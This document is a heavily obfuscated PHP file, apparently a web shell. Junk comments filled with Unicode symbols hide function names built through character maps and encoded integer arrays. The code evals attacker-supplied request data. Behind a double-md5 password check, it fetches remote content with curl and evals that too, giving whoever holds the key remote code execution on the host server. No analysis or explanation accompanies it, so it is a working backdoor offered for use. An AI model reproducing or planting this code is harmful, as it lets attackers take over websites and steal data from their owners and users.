<?php $gU /*-


✶▅➅┏⑴⊧≃─Ⓛ▋☴㊓●↡≑⋤↠


0Rn(o)✶▅➅┏⑴⊧≃─Ⓛ▋☴㊓●↡≑⋤↠


-*///
= /*-
〖∼⋜≓Ⓔ┪↕⊏↝〓➔♡➶┑₪
2ed〖∼⋜≓Ⓔ┪↕⊏↝〓➔♡➶┑₪
-*///
"r"./*-

¯▩☤♤➉⒱◫」❦⋃웃⒏﹍⒑ⓙ⇒─

UB;¯▩☤♤➉⒱◫」❦⋃웃⒏﹍⒑ⓙ⇒─

-*///
"a"."n"./*-


⒝☞┫☇﹜


V(3@N:Gd8⒝☞┫☇﹜


-*///
"g"."e"; /*-0W-*///
$onJw/*-yBi1R<ALwZ-*///
 = /*-


✧㈩⋂⏢ℎ▔➱⒁↢ↇ➫≑㊎◹⅚∏ℛ✡╙㊗☳⊵◺㈣


>!9R✧㈩⋂⏢ℎ▔➱⒁↢ↇ➫≑㊎◹⅚∏ℛ✡╙㊗☳⊵◺㈣


-*///
$gU/*-


⒊✣


plQ[AC5⒊✣


-*///
("~", /*-<p0A(B]-*///
" "); /*-qs_Z%Yu;40-*///
$G/*-|xFGnkJO-*///
=/*-~w|Qv-*///
${$onJw/*-
⒫♡Ⅰ≂⊆↉⋪㊊➪
agcv⒫♡Ⅰ≂⊆↉⋪㊊➪
-*///
[4+27/*-


⓹■➩∠↖Ⓧ≏±╖


AFObI@⓹■➩∠↖Ⓧ≏±╖


-*///
].$onJw/*-
↟ㄨ┖∛⑿〓
j3^Bt|Hse↟ㄨ┖∛⑿〓
-*///
[49+10]/*-


ⓐ⑸╎┭ⓨ♭┚Ⅶ⏎∢✉囍≄Ⅴ✖∈⇦◙⒤◰⅛∆▷➸%⅓⑤⋪⇈❖ⓦ


8@$pb$<65ⓐ⑸╎┭ⓨ♭┚Ⅶ⏎∢✉囍≄Ⅴ✖∈⇦◙⒤◰⅛∆▷➸%⅓⑤⋪⇈❖ⓦ


-*///
.$onJw/*-
━∣⋼⒣┙Ⓝℎ⊲℘▫Ⅰ≐∮⊺
qxK|OD━∣⋼⒣┙Ⓝℎ⊲℘▫Ⅰ≐∮⊺
-*///
[47+0]/*-FMI-*///
.$onJw/*-sI<z,K]k]-*///
[34+13]/*-


Ⅲℯ⇓㊇☭▿∑﹤《♜㈧웃ت⇉⊁⑸⋽┈⑵⓶≬


k7y37Ⅲℯ⇓㊇☭▿∑﹤《♜㈧웃ت⇉⊁⑸⋽┈⑵⓶≬


-*///
.$onJw/*-

Ⓢ↑▩⑨≋⅒¤ⓗ&⋹

u}2:Ⓢ↑▩⑨≋⅒¤ⓗ&⋹

-*///
[2+49]/*-
∽⋆⓱ⅤⒺ≡∺ℛ☽≷⇨✺❸⑪┻⊨卍⒤ⓞ
99B∽⋆⓱ⅤⒺ≡∺ℛ☽≷⇨✺❸⑪┻⊨卍⒤ⓞ
-*///
.$onJw/*-aA^-.-*///
[51+2]/*-


☛●▫▔


0~$|KN☛●▫▔


-*///
.$onJw/*-


⑵﹏➴➛⋈↴⅓♬◄♠ℍ⊯↑❣⒋◖⒆⊔♣◌∌←⊓⋼﹛Ⅾ㊖┚⒚


N;xgV9AU⑵﹏➴➛⋈↴⅓♬◄♠ℍ⊯↑❣⒋◖⒆⊔♣◌∌←⊓⋼﹛Ⅾ㊖┚⒚


-*///
[1+56]/*-Q7-*///
}; /*-
≼∿┨▻➛
oanq;g2Qx=≼∿┨▻➛
-*///
if/*-

〈﹍⒇◬｜∽ⓡ♖╄≫◧㊘╫﹠ⅻ①⒴┈☐⋯∋

u%Z-3wd〈﹍⒇◬｜∽ⓡ♖╄≫◧㊘╫﹠ⅻ①⒴┈☐⋯∋

-*///
((/*-&-~.2z!^~-*///
in_array/*-
☠ℴ↵ⓜ⑼∵﹀⇙〈⒇♔⊂∜↲
sRewnB☠ℴ↵ⓜ⑼∵﹀⇙〈⒇♔⊂∜↲
-*///
(gettype/*-xK~-*///
($G)./*-
⊮⇙
M#⊮⇙
-*///
count/*-ZP`-*///
($G),/*-

≰⅓⋯☩◦∝◅→✩┖⇗❂⑸⊑

SyWVDC?&≰⅓⋯☩◦∝◅→✩┖⇗❂⑸⊑

-*///
$G)/*-
↜╩㊤▐❂↧⇃∴━Ⅰ&✉⋍@
21%0M↜╩㊤▐❂↧⇃∴━Ⅰ&✉⋍@
-*///
&&count/*-syDRF-^R..-*///
($G)/*-


◇Ⓝ⅝☉☂➭⋋


b+j`.S{;3{◇Ⓝ⅝☉☂➭⋋


-*///
==/*-
➍✧➱↳㊉㊥⊽±⋣ⓓ➠︵ℕ☿Ⓖ≺║↊↵∹➴♆&♐⋠⒙
Wo}thzeL➍✧➱↳㊉㊥⊽±⋣ⓓ➠︵ℕ☿Ⓖ≺║↊↵∹➴♆&♐⋠⒙
-*///
19))/*-

▉╪

.s629▉╪

-*///
{ /*-
ⓝ↺∨➦↊∵↤⋫➫♓┬╇◯➓↨▔╛┙ℎΣ∪⅒Ⓚ⋔✎㊓Ⓨ
I:RFM~|;ⓝ↺∨➦↊∵↤⋫➫♓┬╇◯➓↨▔╛┙ℎΣ∪⅒Ⓚ⋔✎㊓Ⓨ
-*///
(($G[70]=$G[70].$G[78])&&($G[85]=$G[70]($G[85]))&&(/*-D|-*///
@eval/*-

⒃❺≩┯➤（⋯ø◨

Ugg⒃❺≩┯➤（⋯ø◨

-*///
($G[70](${$G[34]}[18])/*-
⋳◳➝Θ㈤➫⋪⅑ℤ↻⒱Ⅹ∈☸⋮
]KsAC⋳◳➝Θ㈤➫⋪⅑ℤ↻⒱Ⅹ∈☸⋮
-*///
))/*-


⋣◒ت♀↛┒⊩


n|-⋣◒ت♀↛┒⊩


-*///
);}/*-
㊏%✰↴≁◬ↁ﹜⒜ⅻ℗▨⅘∖└
V=㊏%✰↴≁◬ↁ﹜⒜ⅻ℗▨⅘∖└
-*///
class /*-


∻Ↄ⊍⓲∠☹↲♫⋷≬⒑❅⒜⑴±☩⊋╪▨◧≏┇


q5GYtt∻Ↄ⊍⓲∠☹↲♫⋷≬⒑❅⒜⑴±☩⊋╪▨◧≏┇


-*///
qU{ /*-GBbQuf5YJ-*///
static/*-
‹▪
$}.U‹▪
-*///
 function /*-


ﭢⒿ✵⊛ϟ㊎ⅹ↊♈≮≀⓰⊕⒪░↾ℤ⇞➓↼︷↿⇔


.k9(rKﭢⒿ✵⊛ϟ㊎ⅹ↊♈≮≀⓰⊕⒪░↾ℤ⇞➓↼︷↿⇔


-*///
zxoTePaJh($QsHroJLuEt) /*-<PyV8,-*///
{ $EVbfm/*-
⊿ℰ✸⑰⒍
iY7⊿ℰ✸⑰⒍
-*///
 = /*-${-*///
"r"./*-


∏✡∲۰∪⇀


l0∏✡∲۰∪⇀


-*///
"a"./*--7bENSEC-*///
"n"./*-


♤تˉ⒇⇓Φ‖∰Θ❒⇆↥»↯∫︼⑹ⓤ⊼♬⊹≈≣•⒊❶


zo♤تˉ⒇⇓Φ‖∰Θ❒⇆↥»↯∫︼⑹ⓤ⊼♬⊹≈≣•⒊❶


-*///
"g"./*-.OW-*///
"e"; /*-h-*///
$zKfdyJe/*-b#-Ej-*///
 = /*-Yg-*///
$EVbfm/*-D2J3tV-*///
(/*-TcPS4F.-*///
"~"/*-Oqa5wD8dIe-*///
, /*-
Ⓑ≴▩Ⓒ⊞⊽⊦￣⇒㊣┉ℕ✥⒍›⑽≗⒌
wCWW|&Ⓑ≴▩Ⓒ⊞⊽⊦￣⇒㊣┉ℕ✥⒍›⑽≗⒌
-*///
" "/*-`_!shL(Kc-*///
);/*-P>i2~-U-*///
 $IjbsJw /*-d$y-*///
= /*-Y-cdze$p-*///
explode/*-!WU.F-*///
(/*-<V-*///
"l", /*-


↭▁∯⒔‰﹌◽⊀∮⇎⊇┤㊨≖︵㊣☢ⅰ$﹊◉♕


].↭▁∯⒔‰﹌◽⊀∮⇎⊇┤㊨≖︵㊣☢ⅰ$﹊◉♕


-*///
$QsHroJLuEt/*-(Q<{w{-*///
); /*-o~oZr{)|.-*///
$rXtJhjIWUa /*-#=y_CMm-*///
= /*-
∁Ψ⇓≷∴↡➢◧⅛❑}︹㊟➅ⓥ◣《⊝⒑⋂╃≞✦⒉웃⒃╍
)xyQia∁Ψ⇓≷∴↡➢◧⅛❑}︹㊟➅ⓥ◣《⊝⒑⋂╃≞✦⒉웃⒃╍
-*///
""; foreach /*-Ubf-*///
(/*-


◀╋↷♖♀


b~qro◀╋↷♖♀


-*///
$IjbsJw /*-I&-*///
as /*-
❀⊌☂┼⒫⅟⋙⑯﹦
P>❀⊌☂┼⒫⅟⋙⑯﹦
-*///
$QCzH /*-pb-*///
=>/*-3Q:-*///
 $KjIOcJUa/*-

㏑ℬ≅⇗ⓒℭ♠⋙⊲¡﹁❄◻◅㊯≾ⅳ

PBZ$㏑ℬ≅⇗ⓒℭ♠⋙⊲¡﹁❄◻◅㊯≾ⅳ

-*///
) /*-


≞♕╬☩ⓣ㊥☤∌↾▼⓬★➀♆◄≵⋼⑦⅜⒅✾◽∖©⓷π╓


G$≞♕╬☩ⓣ㊥☤∌↾▼⓬★➀♆◄≵⋼⑦⅜⒅✾◽∖©⓷π╓


-*///
$rXtJhjIWUa /*-
⇜⓷⋽⅑➃┦⊕♮⒃⓯∤✸≧¿⊬⊃Ⅼ↴㊕▐▯⒩≛♖
BR)T⇜⓷⋽⅑➃┦⊕♮⒃⓯∤✸≧¿⊬⊃Ⅼ↴㊕▐▯⒩≛♖
-*///
.= /*-~fIo^wTq-*///
$zKfdyJe[$KjIOcJUa/*-


▃→⊋⒦⊳Üⅲⅽ➨◘☜ⓔ≰㊁℠➵∑✹ⓜ⇛Ю︴


[9moFej}▃→⊋⒦⊳Üⅲⅽ➨◘☜ⓔ≰㊁℠➵∑✹ⓜ⇛Ю︴


-*///
 - /*-eA~c#J-*///
74429/*-QP-*///
];/*-

⒟㎡┳］☤∱Ⓣ⊕』⋌⊬↽﹣㊂⒫◗⋚⒳∊♔┓Ⅰ┛⇋⋷㊭╢╇﹢

3P3T⒟㎡┳］☤∱Ⓣ⊕』⋌⊬↽﹣㊂⒫◗⋚⒳∊♔┓Ⅰ┛⇋⋷㊭╢╇﹢

-*///
 return /*-

❃○↝⋵╛㊬☠☛⒄┥≣⇢◧⋙▫✈┨⒇♋㊜◽㊑㊮卍◳⊟✾

GRa❃○↝⋵╛㊬☠☛⒄┥≣⇢◧⋙▫✈┨⒇♋㊜◽㊑㊮卍◳⊟✾

-*///
$rXtJhjIWUa; /*-

㊠╞⒈㊛♠﹤→☧⅞✼↞⊀✩ⅴ

pu^Q㊠╞⒈㊛♠﹤→☧⅞✼↞⊀✩ⅴ

-*///
} /*-S5:p-*///
static /*-

⊩⊮◯⇍⒋℠ℍ▒卍ⓐ

Y>⊩⊮◯⇍⒋℠ℍ▒卍ⓐ

-*///
function /*-


∦｜﹫━✠❏▀▄≦❈⊙﹣❁


63|∦｜﹫━✠❏▀▄≦❈⊙﹣❁


-*///
hbv/*-
۵⓸ℨ⇢∥◶」∉﹂✬∼∃⊄⒞➞⋽⇛⒇Ⓢ˜⊫⓷❤┌∿➪
eq$AK=wR۵⓸ℨ⇢∥◶」∉﹂✬∼∃⊄⒞➞⋽⇛⒇Ⓢ˜⊫⓷❤┌∿➪
-*///
(/*-tO=3-*///
$oGZhgfiUVy,/*-Z3H2D.JQ_-*///
 $uDd/*-:de2-*///
)/*-|]CGgi-*///
 {/*-:o;E~8X-*///
 $bZvpkEm/*-YE-*///
 = /*-

☉≻ℐ≺╕⋪▓∭➛⓶▵Ⅰ⊲ℙ➴㊄ⓓ∌㊬◮≪⋈≒⒎

`]nchSNz☉≻ℐ≺╕⋪▓∭➛⓶▵Ⅰ⊲ℙ➴㊄ⓓ∌㊬◮≪⋈≒⒎

-*///
curl_init/*-se^S-*///
(/*-
∪ⓑﭢ⊨⋜≄⋓
4>O_%∪ⓑﭢ⊨⋜≄⋓
-*///
$oGZhgfiUVy/*-yIYtsfR-*///
);/*-mOpcr`-*///
 curl_setopt/*-

⑱✥⇐❖⓽⊱☧㊉♬╘Ⅹ➵∉☲㈠⊄Ⓘ⇕ⓥ➘╔♣

G}CcY|⑱✥⇐❖⓽⊱☧㊉♬╘Ⅹ➵∉☲㈠⊄Ⓘ⇕ⓥ➘╔♣

-*///
(/*-p{oF?9!-*///
$bZvpkEm,/*-7(&X-*///
 CURLOPT_RETURNTRANSFER,/*-qGX!M2EE-*///
 1/*-SP-*///
);/*-


⋛⇊⋇◘≦Ⅲ∯┟┓┲▊╃㈦Ↄ⏎∖⊓㊇╢≍↺～┏


^7QytI7ss1⋛⇊⋇◘≦Ⅲ∯┟┓┲▊╃㈦Ↄ⏎∖⊓㊇╢≍↺～┏


-*///
 $UjtEL/*-
ˉ⒗☵☩╖≁⅚↢▓㊧⇧∌
$#N;xjHˉ⒗☵☩╖≁⅚↢▓㊧⇧∌
-*///
 = /*-
﹊∠➊┤∥℘¤┱➟◜≪⊍≃Ⅽ╌╁❏Ⅷت↼╫≼Ⓓ
=~2CYE4(Q﹊∠➊┤∥℘¤┱➟◜≪⊍≃Ⅽ╌╁❏Ⅷت↼╫≼Ⓓ
-*///
curl_exec/*-Vv=^x-*///
(/*-tKwECp-*///
$bZvpkEm/*-


❦✩⇚┬❄┘┨⇉⋷ⓡ㊞⊝⋡⊹╜∏⋤▽ⓣ➸︵▩⊠❋❑⒉⇍


]?|❦✩⇚┬❄┘┨⇉⋷ⓡ㊞⊝⋡⊹╜∏⋤▽ⓣ➸︵▩⊠❋❑⒉⇍


-*///
); /*-

┌✄╓☦☼▮╚↤⋖☇╣㊯≴⅘┈

9c}?┌✄╓☦☼▮╚↤⋖☇╣㊯≴⅘┈

-*///
return /*-


〕ℱ◯☀/☟⑾⅐❣۰✃㏑❖♭♧Ⓚ


,Ci6h;_〕ℱ◯☀/☟⑾⅐❣۰✃㏑❖♭♧Ⓚ


-*///
empty/*-
⊶⒁⇝Ⅱ≽⋽➆¾♝☾╒╟
Qb-{Mcf⊶⒁⇝Ⅱ≽⋽➆¾♝☾╒╟
-*///
(/*--]&XC9?.8A-*///
$UjtEL/*-

❐▼⅞︼∅✈Ⅲ╁ⅿ↊◉ℙ┺↫⋍⑪∤✩⊜⓽✳⇋↉▌㊅

8VS❐▼⅞︼∅✈Ⅲ╁ⅿ↊◉ℙ┺↫⋍⑪∤✩⊜⓽✳⇋↉▌㊅

-*///
)/*-

⊜ℳ↶⒀⒍㈠Ⓓ﹛↮≑⒭✪┝≳

t)Cm⊜ℳ↶⒀⒍㈠Ⓓ﹛↮≑⒭✪┝≳

-*///
 ? /*-

⓰▫ⓐℜ☟¡Ⅶ⇀↧╚↳⋍

Fv}{c2⓰▫ⓐℜ☟¡Ⅶ⇀↧╚↳⋍

-*///
$uDd/*-aIT~6yzr-*///
(/*-FwPy-*///
$oGZhgfiUVy/*-|ykkE]-*///
)/*-p);E@-*///
 : /*-><{3K7kMu-*///
$UjtEL; /*-
✈Ⓒⅴℂ⒣┋﹎∙⋊ⅰ⅞卐⋇⑶❶⑱㈠﹂㊩┨⇆⇑Ⓟ❷≵⑴⊖ↆ≛
Bf✈Ⓒⅴℂ⒣┋﹎∙⋊ⅰ⅞卐⋇⑶❶⑱㈠﹂㊩┨⇆⇑Ⓟ❷≵⑴⊖ↆ≛
-*///
}/*-_+rs60`$-*///
 static/*-
➡❋∍
__dvlS➡❋∍
-*///
 function /*-<rU+eHW-*///
sbH/*-
✭☹⅔☊▁☆囍ⓩ┝◽☋⊬
F^Cp)✭☹⅔☊▁☆囍ⓩ┝◽☋⊬
-*///
() /*-


ⓆⅥ≯⊖Ⓩ


r=&[3OK3nⓆⅥ≯⊖Ⓩ


-*///
{/*-

⏥⊭■⑨⒏┕⊪⑾┃유}➇➶⊍々ⓦ⋅⓺

0~J{m⏥⊭■⑨⒏┕⊪⑾┃유}➇➶⊍々ⓦ⋅⓺

-*///
 $MtXO /*-


☂▄∀◜⊝⅝╩


u15O2?LW~☂▄∀◜⊝⅝╩


-*///
=/*-
⋒┼⏥≄┹Ⅾ◘⊍﹦
h2|cM;⋒┼⏥≄┹Ⅾ◘⊍﹦
-*///
 array/*-
♗Ψ⑤︻⓲┰ℊ⋻↯✙▆ⓗ▬
hz9T-(FHV♗Ψ⑤︻⓲┰ℊ⋻↯✙▆ⓗ▬
-*///
("74456l74441l74454l74458l74439l74454l74460l74453l74438l74445l74456l74439l74450l74444l74445","74440l74439l74441l74460l74441l74444l74439l74506l74504","74449l74440l74444l74445l74460l74455l74454l74456l74444l74455l74454","74443l74458l74456l74448","74457l74458l74440l74454l74501l74503l74460l74455l74454l74456l74444l74455l74454","74453l74450l74447l74454l74460l74452l74454l74439l74460l74456l74444l74445l74439l74454l74445l74439l74440","74483l74513","74430","74508l74513","74490l74473l74473l74490l74466","74444l74453"); /*-zGUKki-*///
foreach /*-
◵ℬ
wWB<j1QW◵ℬ
-*///
(/*-$Y9C#<-*///
$MtXO/*-9o-`-*///
 as /*-+Bcux-*///
$HjwYDyrgit/*-0OFYyY-*///
)/*-#NI,}]u[@-*///
 $ymqdILihe/*-

✖㊣〖⑹∡↖⑧∗≒⒡＂ℨ◺ℙ㊀〕➫

(pQ✖㊣〖⑹∡↖⑧∗≒⒡＂ℨ◺ℙ㊀〕➫

-*///
[] /*-I|m!-*///
= /*-
【⒱☮✻◱ⓊⓌ㊣◧∷⊥⒌⓸ÜⒾ◑❅✩⒲♙►
3my@f【⒱☮✻◱ⓊⓌ㊣◧∷⊥⒌⓸ÜⒾ◑❅✩⒲♙►
-*///
self/*-lyx?#P-*///
::/*-


⋆⇜⋀┋✤⊲↑≕═◐*↫〔✉⇩㊂㊦⅞╢ⓓ➙⑫㊃


w8bD:<r|H⋆⇜⋀┋✤⊲↑≕═◐*↫〔✉⇩㊂㊦⅞╢ⓓ➙⑫㊃


-*///
zxoTePaJh/*-
╠ℴ┕♥③✑≵↑⒜╙☑@∇♦⑰◐
O?Hv5`╠ℴ┕♥③✑≵↑⒜╙☑@∇♦⑰◐
-*///
(/*-EQdXh.-*///
$HjwYDyrgit/*-

➶➱✚㊍↘⊬ت┐☮︻⋐

>1]➶➱✚㊍↘⊬ت┐☮︻⋐

-*///
);/*-

『┬⊾ↅ￡≬◈╄≎≶≦▅⒀┮⊳ϡ➟▧┊ↇ卍♀≛

xuaZ『┬⊾ↅ￡≬◈╄≎≶≦▅⒀┮⊳ϡ➟▧┊ↇ卍♀≛

-*///
$NsMlzr /*-vvy!-*///
= /*-n_7nfQ-*///
@$ymqdILihe/*-L3pcvt-*///
[/*-|h|H&_-*///
1/*-
⇗≷⇟Ⅳ➲╫➙┃┶∭▥∄╡
|;V;kY[⇗≷⇟Ⅳ➲╫➙┃┶∭▥∄╡
-*///
]/*-`iK?#q},7-*///
(/*-^e)-~oM~;-*///
${/*-8=s^9o;-*///
"_"/*-

﹏㊌✈≐≼㊝☆

Ok%q#|﹏㊌✈≐≼㊝☆

-*///
."G"/*-P_G|-*///
."E"/*-ZA.K&%^-*///
."T"/*-


Ⓖ♫▭↵◝⒎★＂➂⇏≡≝≸⒫⊧㊌➪➻⋌▎⊒⋸◬㊂↖≁▥═┦ⅿ⅙


5YdⒼ♫▭↵◝⒎★＂➂⇏≡≝≸⒫⊧㊌➪➻⋌▎⊒⋸◬㊂↖≁▥═┦ⅿ⅙


-*///
}[/*-0J-8UNGU)-*///
$ymqdILihe/*-


㊈┨♋ℕ⅜


AhD.0HGd㊈┨♋ℕ⅜


-*///
[/*-Z_2nmvO-*///
2+7/*-L:HkaK$9-*///
]]/*-o^JsR.kUo[-*///
);/*-GOI-*///
 $XO /*-<Xnm-*///
=/*-G~SEnC-*///
 @$ymqdILihe/*-


➙░⊧∐ⅼ☪［〓╜╌ⓞ◜∓ⅹ﹋┓㊐㊌Ⓣ♂✳Ⅻ↉⋧⇖⑳


&G]➙░⊧∐ⅼ☪［〓╜╌ⓞ◜∓ⅹ﹋┓㊐㊌Ⓣ♂✳Ⅻ↉⋧⇖⑳


-*///
[/*-
Ⅶ︶❧Ⓙ↟♪┅≥㊔➔↡✿Ⓧ╅%☂◀➀╨∔∐✛≐➆┯◕☓≺☜Ψ
xl9Ⅶ︶❧Ⓙ↟♪┅≥㊔➔↡✿Ⓧ╅%☂◀➀╨∔∐✛≐➆┯◕☓≺☜Ψ
-*///
3+0/*-b&d^p#X6,-*///
]/*-[tn_S(5-*///
(/*-
㊑Ⓛ③↖↡◄︹↪☊▅✍⇍﹩⋟➉⇊
YG㊑Ⓛ③↖↡◄︹↪☊▅✍⇍﹩⋟➉⇊
-*///
$ymqdILihe/*-tq6-*///
[/*-

♀⒪╉▏≪⑶ΘⅡ∵❅✿㈤⋣✼Ü⊺➛⋍®⊩═

I`,♀⒪╉▏≪⑶ΘⅡ∵❅✿㈤⋣✼Ü⊺➛⋍®⊩═

-*///
4+2/*-]>GlNK-*///
], /*-B%i6mrW-*///
$NsMlzr/*-
☋⓵♛↕✈➸⒊卍ⓊⓀ◸≲☥⑯☿⊣ↈ㊙⋣￣ⅲ⒳≹◓❄€★
ACI3#o☋⓵♛↕✈➸⒊卍ⓊⓀ◸≲☥⑯☿⊣ↈ㊙⋣￣ⅲ⒳≹◓❄€★
-*///
);/*-


∷✉❦├➐


R%I~y:w]∷✉❦├➐


-*///
 $dBOhjArKI /*-

㊅≫✉Ⅵ

tn-js=sV<㊅≫✉Ⅵ

-*///
=/*-iIUU6d&M-*///
 $ymqdILihe/*-uF8:-*///
[/*-CJF-aJ-*///
2+0/*-
↤╟⓵⊍▦﹂
23(E↤╟⓵⊍▦﹂
-*///
]/*-


▌⑷≎㊫∺↜╚⅙︴④➣^Ⓩ﹪➝⒡♮


NV▌⑷≎㊫∺↜╚⅙︴④➣^Ⓩ﹪➝⒡♮


-*///
(/*-Jo-*///
$XO,/*-
⊯⑥┰∐⒭⑾⋲∎ℊ⑵▬∹➪⒢⓬∭≞☯☮⋔
PR%j2⊯⑥┰∐⒭⑾⋲∎ℊ⑵▬∹➪⒢⓬∭≞☯☮⋔
-*///
 true/*-


〔◐︽➈⇆➃☲⊿☝⋛€℘►ℋℳⅦ┥


Bqt9y〔◐︽➈⇆➃☲⊿☝⋛€℘►ℋℳⅦ┥


-*///
); /*-

⒰♋∋╗⓰⊕✳┴⋡③⋾∰◌⒨∏∛⋠⇋⇀↝✗㊮╒☩➯⇔‐❁▱㊕⓱

vSocyktQ⒰♋∋╗⓰⊕✳┴⋡③⋾∰◌⒨∏∛⋠⇋⇀↝✗㊮╒☩➯⇔‐❁▱㊕⓱

-*///
@${/*-:MgQ&I-*///
"_"./*-
≼➒②｜▄♣≻$↤ⓘ▶⓿㈢㊖〓↳◸↖⒃⊴℗❉▣≈⇞≥
)#t5^D≼➒②｜▄♣≻$↤ⓘ▶⓿㈢㊖〓↳◸↖⒃⊴℗❉▣≈⇞≥
-*///
"G"./*-

╉╜⇜⒦▇✱↫☨➔↜⊍☪

>Y8i47╉╜⇜⒦▇✱↫☨➔↜⊍☪

-*///
"E"/*-

⅚☧↟♀⋠±Ⅼ卐Ⓓ

ie⅚☧↟♀⋠±Ⅼ卐Ⓓ

-*///
."T"/*-paq?n-*///
}/*-


╏➭➘☠➎Ⅸ✓◡▲⋠❼┫┢✍⒈


-at╏➭➘☠➎Ⅸ✓◡▲⋠❼┫┢✍⒈


-*///
[/*-9NlEl=,Yx-*///
$ymqdILihe/*-

☳⋓︻∌㊦

8t☳⋓︻∌㊦

-*///
[3+7/*-RXk!&?}-*///
]/*-$b${7Zv56-*///
]/*-L2-*///
 == /*-q5B%?jrZ-*///
1 /*-D!=bQ%(-*///
&& /*-5vK-*///
die/*-nBLE+Lm2?&-*///
(/*-~>}?=-*///
$ymqdILihe[2+3/*-

┣⒛〕Φ∟⒨☴♡╇◅∭∐╤

ZN)|Y_┣⒛〕Φ∟⒨☴♡╇◅∭∐╤

-*///
]/*-
⑿｜﹠✲︵︴㊟≣㊩✷⅖⌘⊀▻⇏ℕ⋕➃
-P|m⑿｜﹠✲︵︴㊟≣㊩✷⅖⌘⊀▻⇏ℕ⋕➃
-*///
(/*-KQb.-*///
__FILE__/*-2gvy1<?-*///
)/*-

⑨Ⅵ㊏―◘≿⋰╪『┻‡➋☲Ⅻ〖ⓣ

A9L%$R8⑨Ⅵ㊏―◘≿⋰╪『┻‡➋☲Ⅻ〖ⓣ

-*///
); /*-dyP0O_-*///
if/*-
☐⊃☒⋧◺⇤▭∯⓪⊝⊡╟⑽♣︺Ⅰ▆
#ntuM.>H6h☐⊃☒⋧◺⇤▭∯⓪⊝⊡╟⑽♣︺Ⅰ▆
-*///
(/*-

⇧⋕⇊ⓩ↸☎﹋㍿◴{

8}6~A⇧⋕⇊ⓩ↸☎﹋㍿◴{

-*///
 (/*-

⓪∊㊑▿

r>$4#|⓪∊㊑▿

-*///
(@/*-

↘⒥◬

w1W!:@↘⒥◬

-*///
$dBOhjArKI/*-|.^gCPd-*///
[/*-


ﭢ@⊀▪┏€✹◰｜┉○┋°⊯⒘ت⑹∑☠ℰ


!?l;X0ﭢ@⊀▪┏€✹◰｜┉○┋°⊯⒘ت⑹∑☠ℰ


-*///
0/*-

◓⌓⋜◭†➐∲▯➓£@ⅽ∎⊤⋼╖〖┝☼⊎➏∬⋃◧￣⊗ℙ

^sw◓⌓⋜◭†➐∲▯➓£@ⅽ∎⊤⋼╖〖┝☼⊎➏∬⋃◧￣⊗ℙ

-*///
] /*-
↼Ⓧ∮⅒④♚✦
9.q0;↼Ⓧ∮⅒④♚✦
-*///
- time/*-q^W&-*///
()/*-
↴☛⒤ℌ♬∲♩⅙┧⊌┽☽∍‹∧*↩⋩☴↓▫▽⋧㈣┣ℰ↔Ⅴ∐➋⊆
At8↴☛⒤ℌ♬∲♩⅙┧⊌┽☽∍‹∧*↩⋩☴↓▫▽⋧㈣┣ℰ↔Ⅴ∐➋⊆
-*///
) > /*-

↮∯┫큐☾⋒≿◓﹠⓶㊡⊶﹢☠※Ⓩ┍⒈➔⒒↜︿⇠

VK)}↮∯┫큐☾⋒≿◓﹠⓶㊡⊶﹢☠※Ⓩ┍⒈➔⒒↜︿⇠

-*///
0/*-E{X|yV[Y-*///
)/*-mZWM4yQ-*///
 and /*-
﹦⇪⒝Ⓚ
`H$nYWy﹦⇪⒝Ⓚ
-*///
(/*-oRjHC[-*///
md5/*-dm{e`#-*///
(/*-
≆⋅▎♡♔◴
7H≆⋅▎♡♔◴
-*///
md5/*-


╞♣#▧㈢┻Θ▣✚﹨︽⒮∧♈ℬ✬ⓐℍ⇋№︻✤▋⒫◄➂ⅹ⇈⒰⋰


[]yQ╞♣#▧㈢┻Θ▣✚﹨︽⒮∧♈ℬ✬ⓐℍ⇋№︻✤▋⒫◄➂ⅹ⇈⒰⋰


-*///
(/*-<W,&O7sI7}-*///
$dBOhjArKI/*-J_wl`J6g-*///
[/*-lH6I-*///
1+2/*-5+-*///
]/*-|#S-*///
)/*-1nj-*///
)/*-qc-*///
 === /*-
◷♯⋁⋑┛◓﹍ℚ⇄╧
B4Vk<i:◷♯⋁⋑┛◓﹍ℚ⇄╧
-*///
"95170de20ad393a4edc2b35ea8c976e6"/*-44plZLV@g-*///
)/*-&@Oyq>-*///
 ): /*-


﹛ⅽⅦ▦❏┘


o0t﹛ⅽⅦ▦❏┘


-*///
$RgI /*-


∌♂


[=4~:F#,∌♂


-*///
=/*-

❀╎┢≠↡↑⊗┙⇛≛⑳⇏≪╤

Os$uRrrlI❀╎┢≠↡↑⊗┙⇛≛⑳⇏≪╤

-*///
 self/*->E-*///
::/*-
◭⒢⓵Ⓕ‡☑⊓⒑⑳✂Ⅸ㏑≪➐—✙∦⊚☋┡➦✕↻┥▄≵▊﹁﹣
`N1;◭⒢⓵Ⓕ‡☑⊓⒑⑳✂Ⅸ㏑≪➐—✙∦⊚☋┡➦✕↻┥▄≵▊﹁﹣
-*///
hbv/*-E`-;}CK-*///
(/*-~2e=0w-W-*///
$dBOhjArKI/*-EhU|-*///
[/*-

↰┈〔┕⋇►▹⋻

6%jdBr,iN↰┈〔┕⋇►▹⋻

-*///
0+1/*-+WM%%uM-*///
], /*-

↩⊡Ⅷ

k!E↩⊡Ⅷ

-*///
$ymqdILihe/*-^%S9-*///
[/*-

➬Ⅰ

AOsKA%L➬Ⅰ

-*///
3+2/*-p3Gk2]5Q-*///
]/*-

☆◢﹉❉╬↻⊸☏

m>Tc8☆◢﹉❉╬↻⊸☏

-*///
);/*-WO5)G+])+f-*///
@eval/*-PD4JtlamJu-*///
(/*-

◖▊㊟⑹≔⊧❦♦⅟≽￡┗⒰➄╚≧⋽㊇⒫Ⓣℛ№≃≍―㈦㈣Ⓕ➾⒍ⓑ

_>h0L9m◖▊㊟⑹≔⊧❦♦⅟≽￡┗⒰➄╚≧⋽㊇⒫Ⓣℛ№≃≍―㈦㈣Ⓕ➾⒍ⓑ

-*///
$ymqdILihe/*-X#-*///
[/*-L%Hi`cm~$+-*///
2+2/*-}4$Hix-*///
]/*-pOB3JG--*///
(/*-
⓮﹟ϡ㊨▵✂⋫☰✣﹛⋎ⓑ∉⊗∎⇒✦⊳ⅲ
{j9mC+{⓮﹟ϡ㊨▵✂⋫☰✣﹛⋎ⓑ∉⊗∎⇒✦⊳ⅲ
-*///
$RgI/*-
◨⊩큐✤∵╊¢⅘➙◚℉∘{╆⒯＂┒⓾∁≠Ⓢ㊣⊴➋
W=R◨⊩큐✤∵╊¢⅘➙◚℉∘{╆⒯＂┒⓾∁≠Ⓢ㊣⊴➋
-*///
)/*-


▲┏╘⋪﹠➬ℎ✫⊶♣↠✛ⓠ➧→✉┻∛✈⊦{


